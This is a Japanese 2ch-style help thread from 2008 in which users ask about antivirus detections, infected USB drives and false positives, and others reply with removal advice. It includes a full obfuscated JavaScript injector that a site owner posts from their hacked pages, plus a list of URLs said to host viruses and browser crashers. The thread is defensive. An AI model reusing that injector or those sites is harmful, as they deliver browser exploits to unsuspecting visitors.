08/12/05 02:19:42
セキュリティ初心者質問スレッドpart114
スレリンク(sec板:784番)
784 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/12/05(金) 01:04:18
最近MS02-039_SQL_SERVER_RESOLUTION_EXPLOITというウイルスを緊急ブロックしましたという警告が
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?
167:名無しさん@お腹いっぱい。
08/12/05 12:38:59
>>142です!
報告が遅くなりすみませんでした。
IEを削除し、再インストールしました。
その後、2日経っていますが音楽は鳴らなくなりました!
みなさんありがとうございました!
168:名無しさん@お腹いっぱい。
08/12/05 13:49:11
名前:(c) C:\WINDOWS\system32\dmserver.dll
脅威の名称: (D)W32/Patcher
状態:(E) 1025
パソコンを使っていたらこのようなメッセージが表示されました。
グーグルで調べても詳しいことはよく分かりません。
このウイルスは、一体どのような性質を持っているのか、
また、どれくらい危険なウイルスなのかを教えていただけないでしょうか。
お願いします。
使っているセキュリティーソフトはマカフィーです。
最近行った作業は、
SpywareBlasterやRPGツクールの無料ゲームとランタイムをダウンロードです。
169:名無しさん@お腹いっぱい。
08/12/05 16:12:30
virustotalに投げてみれば?
170:名無しさん@お腹いっぱい。
08/12/05 17:23:21
>>162
それってサウンドがいじられてるだけじゃないの?
Windowsの開始時の音をそのWAVだかMP3だかにされてるとか
171:名無しさん@お腹いっぱい。
08/12/05 20:55:27
ampfrb.cmdって何ですか?
ドライブ全部にあるんですけど。
172:名無しさん@お腹いっぱい。
08/12/05 21:01:35
>>142さん
162です。
報告ありがとうございます。
IE8削除してIE7に戻してみました。
暫く様子をみてみます。
173:名無しさん@お腹いっぱい。
08/12/06 07:37:49
>>164さん
162です。
flashgetはかなり前から入れてますから関係無いと思います。
174:名無しさん@お腹いっぱい。
08/12/06 16:13:52
【使用OS】 「XP home sp2」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてます」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「されてます」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
C:WINDOWS\system32\taskmagr.exe
さきほどPCを立ち上げたところ、上記のファイルから
TROJ_AGENT_APXというトロイが見つかりました、と表示され
ウィルスバスターで隔離しましたが、トレンドマイクロにも上記トロイの情報は無く
駆除ができません。
どのようなウィルスかもわからず不安です。今後どのように対処すべきでしょうか?
175:名無しさん@お腹いっぱい。
08/12/06 17:06:13
ウイルスの命名はベンダーでばらばらなんだから
トレンドマイクロの検出名はトレンドマイクロにしかわからんだろ。
バスタースレで。
176:名無しさん@お腹いっぱい。
08/12/06 18:46:58
>>174
隔離できてるなら問題ないのでは?
177:名無しさん@お腹いっぱい。
08/12/06 20:34:09
>>173
返答有難うございます。
以前からいれられてるんですね。
flashget入れてから頻繁にウイルスが見つかったもので…
なにやらflashgetを起動させると頻繁に中国のサイトにアクセスしていたりしたので。
178: ◆N9P3SuvBPo
08/12/06 22:03:27
>177
その中国のサイトを教えてくださいな。
あ、頭のhtは抜いて。
179:名無しさん@お腹いっぱい。
08/12/07 00:03:33
中華製のスパイウェアソフトを入れるほうが悪い
いますぐアンインストールしろよ
中華製のソフトは使わないことだな
180:名無しさん@お腹いっぱい。
08/12/07 01:34:54
↑バスター使い
181:名無しさん@お腹いっぱい。
08/12/07 03:26:00
>>178
詳しくは分かりませんが、
PeerGuardian2で動向を監視したところ、
China IP
China Education and Research Network
fake emule servers
(Spam) ServerBeach
等が頻繁にブロックされていました。
尚、flashgetを終了すると↑へのアクセスは止まりました。
182:名無しさん@お腹いっぱい。
08/12/07 03:30:54
ほい。
URLリンク(www.shareedge.com)
183:名無しさん@お腹いっぱい。
08/12/07 08:23:06
flashgetのバージョンが古くないか
184:名無しさん@お腹いっぱい。
08/12/07 12:29:25
>>182
自分でもすぐ調べては見たのですが、
やはりスパイウェア仕込んでることで有名みたいですね。
なにか、いつかのバージョンから無くなったとか書いてあったのですが…
>>183
VectorでダウンロードしたFlashGet1.9.6です。
185:名無しさん@お腹いっぱい。
08/12/07 18:21:11
A.状況
【使用OS】 「Xp SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVG Free 8.0」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新されている」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「無」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「(1)ファイルをコピーしようとしたら、次のメッセージが表示された
アクセスしたファイルは感染しています。
ファイル名:C\System Volume Information\_restore{667B7FC2-A2DB-4c51-9B6c-1A4ECAE5387C}\RP295\A0038262.exe
脅威名:トロイの木馬 PSW.OnlineGames.2.S
オープン時に検出されました
処理名:C\WINDOWS\System32\svchost.exe
処理ID:1320
(2)スキャンしたら、
a.上記ファイル名の最後が次のものが5件表示され、
A0038268.exe 1件
A0038262.exe 3件
A0039185.exe 1件
b.その後、次のメッセージが表示された
D:\System Volume Information\_restore\_restore{667B7FC2-A2DB-4C51-9B6C-1A4ECAE5387C}\RP295\A0038211.exe
c.最後に、
検出された感染 66
除去または修復された感染オブジェクト 66
警告数 70
その他 0
186:185(続き)
08/12/07 18:22:29
(3)USBメモリーをコマンドプロンプトでattrib表示すると
SHR autorun.inf SHR f.exeが表示される。
(4)フォルダオプションで、「すべてのファイルとフォルダを表示する」にチェックして
[適用]→[OK]をした後、フォルダオプションを確認すると
「隠しファイルおよび隠しフォルダを表示しない」に変わっている。
(5)マイコンピュータでハードディスクアイコンをダブルクリックすると
何で開くか聞いてくる。
(6)外付けのポータブルディスク3台も感染している模様。」
B.質問
1.どういうウィルスに感染しているのでしょうか?
(1)1種類なのか複数なのか分かりません。
(2)PSW.OnlineGames.xxxというのはあるのですが、
PSW.OnlineGames.2.Sというのは見つかりません。
2.対策は、どうすれば良いのでしょうか?
宜しくお願いします。
187:名無しさん@お腹いっぱい。
08/12/07 18:41:28
>>186
USBなんかを通して感染を広めるウイルスとネトゲのパスなんかを盗むものに感染してる
両方質が悪いしばっちし感染してるからすぐリカバリーしろ
188:名無しさん@お腹いっぱい。
08/12/07 18:59:59
>>185
URLリンク(mm113.blog49.fc2.com)
URLリンク(www.cyber-concierge.co.jp)
189:185
08/12/08 08:12:59
>>187,>>188
レスありがとうございます。
URLリンク(www.cyber-concierge.co.jp)
を、やってみます。
190:185
08/12/08 11:04:20
autorun.infを止める方法についての追加質問です。
次の2つの方法がネットに書かれていたのですが、
このウィルスの対策としては、どちらが良いのでしょうか?
(1)グループポリシーの設定を変える
[ファイル名を指定して実行]→gpedit.msc入力→[コンピュータの構成]
→[管理用テンプレート]→[システム]→[自動再生機能をオフにする]
→[プロパティ]→[自動再生機能をオフにする]→[適用]→[OK]
(2)レジストリを変える
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT
\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"
宜しくお願いします。
191:名無しさん@お腹いっぱい。
08/12/08 18:21:11
>>190
どちらもやってることは同じだと思うけど
(1)の方をお勧めしておく
192:名無しさん@お腹いっぱい。
08/12/08 19:26:53
俺はTweakUIで潰してるな
193:185
08/12/08 20:26:35
>>191
レスありがとうございます。
194:名無しさん@お腹いっぱい。
08/12/09 13:35:27
【使用OS】「vista」
【MUの状態】「最新」
【使用セキュリティソフトとバージョン】「光回線でデフォでついてきたNTT西日本セキュリティ対策ツールver15」
【最新か】「最新」
【スパイウェア対策ソフトと状態】「同上」
【スキャンの結果何が検索されたか】「このソフトだと何も検索されない」
だった訳ですが(続く)
195:名無しさん@お腹いっぱい。
08/12/09 13:42:47
ありゃバスターなのでバスタースレでどうぞ。
196:194
08/12/09 13:45:52
ある日突然立ち上がった(購入後半年で初めて)
ノートンsecurity scanによると
【検出されたウイルス】「Unix.penguin
感染場所はJane styleの生活板のログ
JS.Windowbomb
感染場所はJane styleのどこか」
専ブラ使ってるので>>8とは違うのでしょうか?
無償のスキャナで除去不能とか言われるし常駐のソフトでは検出されないしいったいどうしたらという感じです
197:名無しさん@お腹いっぱい。
08/12/09 14:36:30
ノートンお得意の2ch専ブラログの誤検知だろ
198:名無しさん@お腹いっぱい。
08/12/09 22:17:33
>>197
専ブラにも反応するんですか?
やっかいですね…
使ってないしノートン先生はアンインスコします
ありがとうございました
199:名無しさん@お腹いっぱい。
08/12/10 02:51:09
C:\WINDOWS\system32\sens.dll
W32/Patcher
調べても情報が出てきません。
どなたか駆除方法をご存知ありませんか?
200:名無しさん@お腹いっぱい。
08/12/10 07:57:26
【使用OS】 「xp sp3」
【Microsoft Update(MU)の状態】 「最新」
先ほど自動更新でアップデートしたら
悪意のあるソフトウェアの削除ツールで、
TrojanDropper:Win32/Renos.N
なるものが削除されました。
ぐぐても、どんなウィルスなのかいまいちわかりません
これはどんなウィルスなんですか?
よろしくお願いします。
201:名無しさん@お腹いっぱい。
08/12/10 12:27:32
3.0mod3-3.54-setup.exe
a0030828.exe
バスター2009でこの二つがウイルスだって出た
3.0mod3-3.54-setup.exeがWINMXのパッチなのは分かったけど
a0030828.exeが何なのかわからん?
誰か教えてくれ
202:名無しさん@お腹いっぱい。
08/12/10 13:07:15
>>199
sens.dllでググれ
203:名無しさん@お腹いっぱい。
08/12/10 13:46:11
>>201
パスがSystem Volume Information以下だったら、システムの復元のバックアップファイル。
>>200
Renosでググれ。
>>199
誤検出でなければ、sens.dllが改変されてる。
セキュリティソフトで修復出来なかったら、早くリカバリした方がいいよ。
204:名無しさん@お腹いっぱい。
08/12/10 14:40:26
研究でウィルスの検体が大量に欲しいのですが、どこかにzipファイルなどでウイルスをゲットできるサイトありませんか?
205:名無しさん@お腹いっぱい。
08/12/10 17:39:18
>>204
それくらい自分で探そうね。
206:名無しさん@お腹いっぱい。
08/12/10 23:28:56
困っています。下記がバスターコーポレーションで検出
dmserv.dll
C:\WINDOWS\system32\の中で
隔離削除できないため困っています。
セーフモードでもだめでした、何かOS入れ直さないで
修復できる方法ありませんか?
207: ◆N9P3SuvBPo
08/12/11 00:06:51
>206
案内レス
企業用PCでしょうか?
もしそうならシステム管理者にご報告を
208:名無しさん@お腹いっぱい。
08/12/11 07:06:04
ウイルスリムーバーをこらしめたいが
209:名無しさん@お腹いっぱい。
08/12/11 07:51:56
>167 さん
聞こえなくなくったからと言って安心できませんよ。僕も12/4日くらいに取りつかれ、英語交じりの中国語のラジオ放送みたいなのと、クリック音が連続して聞こえる現象がありましたが、断続的で3日ほ現象が無かったのです。どうも夜8時頃に起動すればそうした現象が
出て、他の時間帯ではそうではなありませんでした。Flash getは直ちに削除しましたが、新しすぎるためなのかウィルスセキュリティでは検出できず、いろいろな体験版で対処中です。
210:名無しさん@お腹いっぱい。
08/12/12 19:45:24
>>203
THX
System Volume Informationだから
システムの復元のバックアップファイルなのか?
なんでウイルス扱いなんだ?
隔離してるって出てるけどどうなるんだろう?
更新でソフトを新しく入れるとこんなのばっかり・・・
211:名無しさん@お腹いっぱい。
08/12/13 01:05:56
いまエクスプローラで作業しているのだが
s2.com
ってウィルスかな? ドライブ全てにいるのだが、前からあったかな…
ググッテモよく分からないし…ソース頼む
212:名無しさん@お腹いっぱい。
08/12/13 06:11:09
amvoをうつされたので下のサイトの通りに削除。
その後DドライブにRECYCLERとSystem Volume Informationが出てきたんだけど、これって何で?
今までは「全てのフォルダを表示する」にしてても表示されなかったのに。
スレリンク(sec板)l50
213:名無しさん@お腹いっぱい。
08/12/13 06:13:26
↑winXPSP3です。すまそ。
214:名無しさん@お腹いっぱい。
08/12/13 10:20:04
>>206
OSがファイルをつかんでしまっているためだと思います。
マイコンピュータ右クリック→管理→サービスとアプリケーション
→サービス
サービスの中に怪しい文字列(意味のない文字列)があったら
それをダブルクリック、スタートアップの種類を「無効」にして一度パソコンを再起動、
それからもう一度system32フォルダをコーポレートエディションでスキャン、
これでうちの会社はできましたよ。
一度やってみてください。
215:名無しさん@お腹いっぱい。
08/12/13 10:21:31
システムの復元については機能をとりあえずOFFにするといいと思います。
OSの復元はできませんが最悪再セットアップすればいい話なので。
216:名無しさん@お腹いっぱい。
08/12/13 21:34:35
自分のパソコンがどれだけ防御力が高いかためしたい。
ためしにウイルスに感染できるホームページとかないですか?
当然バックアップしてから挑みます。
自分の防御力を調べてみたいって人少ないのかなあ。
217:名無しさん@お腹いっぱい。
08/12/13 22:04:21
>>216
URLリンク(jp.youtube.com)
まだあるかわかんないけど。
リンクはようつべ
218:名無しさん@お腹いっぱい。
08/12/13 22:28:37
>>217 もっとちょうだい
gog いってみたけど今は配布してないようです。
219:名無しさん@お腹いっぱい。
08/12/13 22:57:54
【激しく既出、危険なサイト一覧=ウイルス、ブラクラ系】
1. //www.hackpalace.com/virii/makers/ (ウィルス)
2. //ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm (ウィルスJS_PETCH.A:セキュリティホールを突いたWMP破壊スクリプト)
3. //easyweb.easynet.co.uk/~hiros/**** (****以降はウイルス名:ウイルス)
4. //www2.strangeworld.org/uedakana/sahra****.*** (****は番号違い、拡張子違いなど:ブラクラ&ウイルス:HTML_SUAR.)
5. //amilala.blogspot.com (ウイルスJS_AMILALA.A作成者のサイト。有害なスクリプトが仕掛けられる可能性あり)
6. //www.kogalu.com/sou/girls/index2.htm (通常はエロサイトだがブラクラ&ウイルスの場合あり)
7. //raus.de/crashme/ (ブラクラ&ウイルス)
8. //www.albinoblacksheep.com/flash/you.html (ブラクラ:Windowオープン/ゾンビ ウィンドウ/無限JavaScriptループ)
9. //www.albinoblacksheep.com/flash/open.html (8と同じです)
10. //www.youareanidiot.org/ (8と同じです)
11. //cfi.hyo-ka.net/kiki01.htm(ブラクラ:Windowオープン。ドクロの壁紙)
220:名無しさん@お腹いっぱい。
08/12/13 23:36:03
>>219 全部行ってみたんですが
みんなウイルスの挙動紹介の安全なHPですね。
221:名無しさん@お腹いっぱい。
08/12/14 01:19:47
スレチなら誘導お願いします。
サイト持ちなんですが、ファイル上げてから暫くするとソースに
よくわからない記述が追加されてしまいます。
サイト感染してるんじゃないですかって、閲覧者からの報告があって
調べてみたら見つけました。
とりあえずローカルファイルには問題ないっぽいので、
サーバーのファイルを全て消去して上げなおしました。
昨日上げなおしてソースチェックしたらなかったので安心してたら、
今日ソース見たときには追加されてました。
今、また上げなおして様子見中なんですが、
また追加されたらどう対処するべきかわかりません。
アドバイスお願いします。
↓がその記述です。
222:名無しさん@お腹いっぱい。
08/12/14 01:22:42
<script>function c102916999516m49435c6be9d24(m49435c6bea4f4)
{ function m49435c6beacc4(){var m49435c6beb495=16;return m49435c6beb495;}
return (parseInt(m49435c6bea4f4,m49435c6beacc4()));}
function m49435c6bebc69(m49435c6bec437){ function m49435c6bedba9(){return 2;}
var m49435c6becc07='';m49435c6beeb49=String.fromCharCode;
for(m49435c6bed3d8=0;m49435c6bed3d8<m49435c6bec437.length;m49435c6bed3d8+=m49435c6bedba9())
{ m49435c6becc07+=(m49435c6beeb49(c102916999516m49435c6be9d24(m49435c6bec437.substr(m49435c6bed3d8,m49435c6bedba9()))));}return m49435c6becc07;}
223:名無しさん@お腹いっぱい。
08/12/14 01:23:42
var zc6='';var
m49435c6bef31b='3C7'+zc6+'3637'+zc6+'2697'+zc6+'07'+zc6+'43E6
96628216D7'+zc6+'96961297'+zc6+'B646F637'+zc6+'56D656E7'+zc6+
'42E7'+zc6+'7'+zc6+'7'+zc6+'2697'+zc6+'465287'+zc6+'56E657'+z
c6+'363617'+zc6+'065282027'+zc6+'2533632536392536362537'+zc6+
'322536312536642536352532302536652536312536642536352533642536
332533312533302532302537'+zc6+'332537'+zc6+'32253633253364253
237'+zc6+'2536382537'+zc6+'342537'+zc6+'342537'+zc6+'30253361
253266253266253637'+zc6+'253666253637'+zc6+'25366625333225366
42536352532652536652536352537'+zc6+'34253266253265253637'+zc6
+'2536662532662536332536382536352536332536622532652536382537'
+zc6+'34253664253663253366253237'+zc6+'2532622534642536312537
'+zc6+'342536382532652537'+zc6+'322536662537'+zc6+'3525366525
36342532382534642536312537'+zc6+'342536382532652537'+zc6+'322
5363125366525363425366625366425323825323925326125333225333225
3334253332253337'+zc6+'253239253262253237'+zc6+'253332253337'
+zc6+'253237'+zc6+'2532302537'+zc6+'37'+zc6+'2536392536342537
'+zc6+'342536382533642533342533312532302536382536352536392536
37'+zc6+'2536382537'+zc6+'34253364253335253334253337'+zc6+'25
32302537'+zc6+'332537'+zc6+'342537'+zc6+'39253663253635253364
253237'+zc6+'2536342536392537'+zc6+'332537'+zc6+'302536632536
312537'+zc6+'39253361253230253665253666253665253635253237'+zc
6+'2533652533632532662536392536362537'+zc6+'32253631253664253
63525336527'+zc6+'29293B7'+zc6+'D7'+zc6+'6617'+zc6+'2206D7'+z
c6+'969613D7'+zc6+'47'+zc6+'27'+zc6+'5653B3C2F7'+zc6+'3637'+z
c6+'2697'+zc6+'07'+zc6+'43E';document.write(m49435c6bebc69
(m49435c6bef31b));</script>
224:名無しさん@お腹いっぱい。
08/12/14 04:57:20
>>221-223
貼り付けたコードの改行や不要部分を取り除いて、エディターでファイルにしてみたところ、
"JS/Obfuscated"と言う名称のトロイであることが判りましたよ。うちのMcAfee+Artemisが
検出しました。
以下のページで、"JS/Obfuscated"と言う名称で検索してみてください。ちなみにMcAfeeの
ページですが、日本語のサイトでは載っていません。USAの方で探せます。
URLリンク(vil.nai.com)
Virus Profile: JS/Obfuscated
Risk Assessment
- Home Users: Low
- Corporate Users: Low
Date Discovered: 11/26/2008
Date Added: 11/26/2008
Origin: Unknown
Length: N/A
Type: Trojan
SubType: Script
詳細な説明が、"JS/Obfuscated.b"とかにしか有りませんが、ブラウザの脆弱性を利用する
スクリプトファイルですね。
あなたのPCが、マルウエアに感染していないのなら、サーバーがSQLインジェクション等で
攻撃されてるんでしょうね。管理者へ至急連絡しないと行けませんね。
225:名無しさん@お腹いっぱい。
08/12/14 12:09:03
単純にIDとパスが漏れてる(推測しやすいとか、トロイ踏んだとか)とかね。
226:名無しさん@お腹いっぱい。
08/12/14 20:48:41
【使用OS】 「windowsXP」
【Microsoft Update(MU)の状態】 「不明」
【使用セキュリティソフトとバージョン】 「セキュリティ24」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新済」
【スパイウェア対策ソフト】 「Kingsoft」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「常時自動更新状態」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「uu.exe」
PCを起動するたびに一時ファイルのフォルダに複数のuu.exeに入っています
しかも対策ソフトも一時フォルダを開けないと反応せず削除しないみたい感じです
調べたところPCに別のウイルスが入っていてそれが勝手にダウンロードしているみたいです
どのような対策をすればよろしいのでしょうか?
227:221
08/12/15 03:26:54
>>224
トロイでしたか…。
PCが感染してる可能性は考えたので、ファイル上げなおす前に一通りのチェックはしました。
別のサーバーでやってるサイトは全く感染しないのでPCが問題という事はおそらくないと思ってます。
もう少しPCチェックしてやっぱり問題がないのなら管理者に連絡してみます。
>>225
感染ばっかり考えてて忘れてました。すぐ変更してみます。
ありがとうございました。
228: ◆N9P3SuvBPo
08/12/15 18:19:19
>227
健康診断のほうに移動されました?
ログに問題は無い様です…
それともしかしてMBAMというツールも使いました?
とりあえずあちらの方の指示を優先してください。
229:名無しさん@お腹いっぱい。
08/12/15 18:55:49
>>211
エクスプローラですべてのファイルとフォルダを表示(隠しファイルの表示)は出来てる?
出来るならc:\windows\system32フォルダにrevo.exeやrevo0.dllとか無いか確認してみて。
もし出来なかったらウイルスが実行されてる状態。
しかも各社ウイルス対策ソフトで全く対策されていないウイルス
230:221
08/12/15 20:19:42
>>228
しました。
MalwareBytes' Anti-Malwareでしたら使いました。
ログは問題なしですか。とりあえず一安心ですが感染原因が不明ですね…。
IDとパスが漏れてたのかもしれないです。
ありがとうございます。指示を待ちます。
231:名無しさん@お腹いっぱい。
08/12/15 20:45:22
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! 4.8.1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「手動」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「C:\WINDOWS\SYSTEM32\ils.dll」
avast! からの警告「疑わしいファイルが発見されました」
と表示されました。
削除していいのでしょうか?
232:名無しさん@お腹いっぱい。
08/12/15 20:54:04
>>231
URLリンク(detail.chiebukuro.yahoo.co.jp)
233:名無しさん@お腹いっぱい。
08/12/15 21:07:59
>>231
avast! Anti-Virus Part99
スレリンク(sec板:30-番)
234:名無しさん@お腹いっぱい。
08/12/15 21:17:42
別スレに書き込んだのですが今皆さん何か問題が起きてるようで
スルーされ気味なのでこちらに書き込ませてください
OS XP
ウィルスソフト avastとspybot
更新はどちらも最近放置してたかもしれません
問題 avastがルートキットを検出したので慌てて指示に従い
再起動後HDDの自動スキャンを開始しました
現在スキャン中で結果待ちですがルートキットは深刻な問題でしょうか?
対処についてはavastの指示に従っていればおkですか?
私のPCを救うアドバイスを戴けませんか
235:名無しさん@お腹いっぱい。
08/12/15 21:22:01
avastが検知した物はavastユーザにしかわかりませんので
avastスレにお帰りください
236:名無しさん@お腹いっぱい。
08/12/17 21:18:06
ウィルスが見つかりましたっていう警告が出たので
詳細を確認してみたんですが、そのウィルスの名前を
ウィルスバスターで検索してみたんですがヒットしなかったので
対処方法とかわからず放置しています
確かHTML_HEKIREみたいな名前でした。
誰かわかる人いませんか?
マジ不安です
237:名無しさん@お腹いっぱい。
08/12/17 21:30:47
>>236
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】 !!!
238:名無しさん@お腹いっぱい。
08/12/17 21:34:56
バスタースレでどうぞ!
239:名無しさん@お腹いっぱい。
08/12/18 22:05:26
【使用OS】 「XP sp2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「NTT西日本ウィルス対策」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
下記のメッセージが出て、インターネットの接続が切断されます。
処理の結果:ウィルス感染ファイルを隔離できませんでした。
このウィルスは手動で処理する必要があります。
ファイル名:C\WINDOWS\system32\HBmhly.dll
ウィルス/スパイウェア名:TSPYLOLYDA.AE
対策等教えて頂ければ幸いです。
宜しくお願いします。
240:名無しさん@お腹いっぱい。
08/12/18 22:50:01
>>239
NTT西日本ウィルス対策と言うのはバスターかな?NTTに聞くのがよいと思うが
ちなみに"TSPYLOLYDA.AE"というキーワードでは見つからないが、ファイルパス名から
調べると、トロイの木馬で、パスワードを盗むマルウエアだと思う。
削除できないのは、それが動作中だから。セーフーモードで起動して削除。
それでも駄目なら、セーフDOSモードで削除となるが、使ってるソフトで方法が異
なるので、NTTサポにまず聞くと良いぞ。
241:名無しさん@お腹いっぱい。
08/12/19 11:20:07
【使用OS】 「XP SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」
スキャンの結果
ファイル名「windows\system32\sens.dll」
ウィルス名「W32/Patcher」
状態「再起動後にスキャン」
となりました。
「対応の必要はありません」とは表示されるのですが
隔離も削除させてくれないので、自動スキャンの度に毎回検出されるので気になります。
URLリンク(detail.chiebukuro.yahoo.co.jp)
↑のサイトを参照して「windows\system32\sens.dll」を他の健康なPCから持ってきたら解消されますでしょうか?
もしくは何か良い策がありましたらご教授願います。
242:名無しさん@お腹いっぱい。
08/12/19 12:43:31
>>241
スレリンク(sec板)
243:名無しさん@お腹いっぱい。
08/12/19 21:40:56
>>239
URLリンク(www.trendmicro.co.jp)
244:名無しさん@お腹いっぱい。
08/12/19 21:42:05
ネットにつながっていないPCのウィルスを除去したいのですが、なにかフリーでありませんでしょうか?
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 過去にネットにつながってたときは「Avast」 を使ってました。
Avastの期限が切れたあとに「トロイの木馬が発見されました!」と警告が出たことがあります。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 ない
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 いない
【ルータの有無】 なし
245:名無しさん@お腹いっぱい。
08/12/19 23:30:43
>>244
URLリンク(drweb.jp)
インストール不要
246:名無しさん@お腹いっぱい。
08/12/20 05:46:34
>>241
システムの復元を無効にする
URLリンク(www.mcafee.com)
フルスキャンを実行する→問題解決後システムの復元をもどす
でokのはず
247:名無しさん@お腹いっぱい。
08/12/20 19:47:45
>>245
ありがとうございました。
248:241
08/12/21 01:08:37
>>244
ありがとうございます。
試してみます。
249:名無しさん@お腹いっぱい。
08/12/22 19:38:14
けっこうおもしろかった
URLリンク(www.interbars.co.jp)
250:名無しさん@お腹いっぱい。
08/12/22 21:14:38
>>249
rootkit駆除に関してとても参考になった。ブログ主は謙遜してるが相当なプロに感じる。
251:名無しさん@お腹いっぱい。
08/12/22 22:02:25
逆汗するならともかくツール2~3個拾うだけならプロとは言わんよ
252:名無しさん@お腹いっぱい。
08/12/22 22:27:34
>>250
同意
いかにrootkitがやっかいなモノかが分かる
253:名無しさん@お腹いっぱい。
08/12/22 23:32:30
a
254:名無しさん@お腹いっぱい。
08/12/22 23:46:21
本日カスペルスキーでスキャンしろと
全社員に通達がありました。
なぜですか?
255:名無しさん@お腹いっぱい。
08/12/23 00:03:57
そりゃ困った社員がウイルス付きPCをLANに繋いだからだろ
256:名無しさん@お腹いっぱい。
08/12/23 00:26:34
【使用OS】WinXP Home edition Version2002 Service Pack3
【Microsoft Update(MU)の状態】被害が出てからupdate
【ルータの有無】 有
【スキャンの結果何が検出されたか】
トロイの木馬(トロジャンなんたら)とスパイウィア
処理第1段階
おとといの夜8時頃からずっとシャットダウンの繰り返し。
カウントダウン→シャットダウン(DCOM Processer Luncherが異常でなんたら)
昨夜は途中、デスクトップにあるIEなどのボタンをダブルクリックしても反応せず。
ウイルスバスター無料版2009をダウンロードしたが、削除はしてくれない。
ありました、というだけのよう。
カスペをダウンロード。
ウィルスバスターの中にウィルスがあると教えてくれる。削除。
そしてネットに繋がらないようになる。
257:名無しさん@お腹いっぱい。
08/12/23 00:30:41
第2段階
もう一台のパソコンでググル。
ようやくSasserという言葉を知り、マイクロソフトのHPで対策。
対策途中、シャットダウンされると、ブラウザのヒストリーが真っ白になる。
なので、さっきのページをもう一度検索する。(お気に入りに登録)
URLリンク(www.microsoft.com)
ここを見て対策したらネットに繋がった。
regeditのレジストリキーは同じものがなかった。ここでUpdate。
悪意のあるソフトウェアの削除ツール (KB890830)をダウンロード。
URLリンク(www.microsoft.com)
一部が削除できないと言われる。
市販ソフトで対応するよう書かれてあったので、ウイルスバスターオンラインスキャンを行う。
スパイウェアが見つかり、削除完了。
再起動してみるが、またカウントダウンシャットダウンの繰り返し。
第3段階
ブラウザ、ネットに繋がったり繋がらなかったり。
ようやくこのスレに辿り着き、カウントダウンを止める。
>>9のF-Secure オンラインスキャナを試そうとすると、ダウンロード完了後、
再起動。(何度やっても。)
今、シーマンテックオンライン検索中。
スパイウェアってこんなに取れないものなんでしょうか。
258:名無しさん@お腹いっぱい。
08/12/23 00:39:23
削除したのに出ました。
Unix.Penguin に感染しています。
VBS.Freelink.B に感染しています。
Unix.Penguin に感染しています。
Macro.src に感染しています。
259: ◆N9P3SuvBPo
08/12/23 00:49:46
>252
俺なら回復コンソールから一掃する。
Rootkitですら回復コンソール上では起動しないから。
やっかいなモノ
>これには同意
>256-257
>ウイルスバスター無料版2009をダウンロードしたが
なるほど…
それまで対策ソフトは入れてなかったわけだな。
それに…
>【Microsoft Update(MU)の状態】被害が出てからupdate
感染後に慌ててしても後の祭り
俺はリカバリーを奨めます!
>258
それは2ch専ブラフォルダからの検出
問題なし
260:名無しさん@お腹いっぱい。
08/12/23 00:56:00
>>259
レスありがとうございます
なんでかファイアウォールが無効になってました
対策ソフトは入れてなかった
買おうかなと思ったけど、どれもこれも削除できないソフトなら
買うものがないなーと考え中
>それは2ch専ブラフォルダからの検出
結局見つけられなかったということですよね
とりあえず、今日もまた深夜まで食い込んだので寝ます
261:名無しさん@お腹いっぱい。
08/12/23 02:34:12
>>260
OS等を含むソフトウエア(ブラウザやフラッシュ、etc...)のアップデートは悪意から守るために、
事前に行っておく必要があり、セキュリティーソフトは悪意を防ぐために使う物で、被害を最小限に抑
えるためにも必要。
できの良い悪意のあるソフトは、一見してPCが異常であることが判らないものもある。今回のように
起動しないとか異常終了するなど、すぐに判るのはラッキーだと考えるべき。標準のFWを無効にする
など当たり前で、セキュリティーシステムを止めたり、自身の存在を検出できなくする物もある。
何も対策してないPCで、マルウエアが暴れたら手の施しようが無くなる。度々リカバリーしたくない
のなら、サポートの有る有償のセキュリティーソフトを使うことをお勧めする。
262:名無しさん@お腹いっぱい。
08/12/23 18:17:05
ADWBJC?なんたらのウイルスにより、インターネットアクセスできません。手動で削除してくれと書いてますが、どうすれば…わかる方いますか?
263:名無しさん@お腹いっぱい。
08/12/23 19:38:09
>>262
>>1
俺たちはエスパーではない
264:名無しさん@お腹いっぱい。
08/12/23 22:03:02
>>261
